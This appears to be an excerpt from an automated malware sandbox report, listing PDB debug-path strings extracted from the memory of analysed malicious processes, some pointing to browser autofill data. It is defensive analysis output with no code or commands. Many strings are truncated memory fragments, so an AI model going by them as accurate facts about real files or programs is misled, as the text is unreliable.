Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbf source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdB</sPrinC><sPrinC>GrEbbeV\DeWktoT FiHes< source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ming.lock= source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\L.usernlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.LOG1` source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2uy source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb2 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb} source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2Y source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lmp.pdb source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831he source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\AC\ source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: jtfCFDmLdX.exe, jtfCFDmLdX.exe, 00000000.00000000.1648365598.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, TE0FN83.exe, TE0FN83.exe, 00000001.00000000.1650796309.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Tg9kb35.exe, Tg9kb35.exe, 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831.1\ source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2aming.lock0 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831e\. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2026868148.0000000008377000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.0000000008160000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbcrobat source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\sicl4o\Eternal.pdb source: Tg9kb35.exe, 00000002.00000003.1655167777.00000000048FC000.00000004.00000020.00020000.00000000.sdmp, 4ZZ099qJ.exe, 00000006.00000000.1659874995.000000000101A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbU source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: offDef.pdb source: 6rR8iy1.exe, 0000000C.00000003.1757109513.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1877778092.000000000217C000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1883266505.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1878139256.0000000002420000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1882966196.0000000003555000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\x76cyldboe\Eternal.pdb source: 2zx1310.exe, 00000003.00000000.1655916149.00000000009EA000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb.e source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdbe\* source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data.pdb\* source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Google\Chrome\User Data\AutofillStateses.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831he=95 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Silk.pdb source: explorer.exe, 0000000B.00000003.1967274019.0000000009C80000.00000004.00000001.00020000.00000000.sdmp, 8427.exe, 00000012.00000000.1962650891.0000000000802000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: nlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb5 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831wy source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58318 source: AppLaunch.exe, 00000009.00000002.2024876554.0000000008182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb7V source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbc source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdbml source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: 6rR8iy1.exe, 0000000C.00000003.1757109513.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1877778092.000000000217C000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1878139256.0000000002420000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1882966196.0000000003555000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbdD source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb_) source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb(: source: AppLaunch.exe, 00000009.00000002.2023917736.0000000008160000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbE source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbAC source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
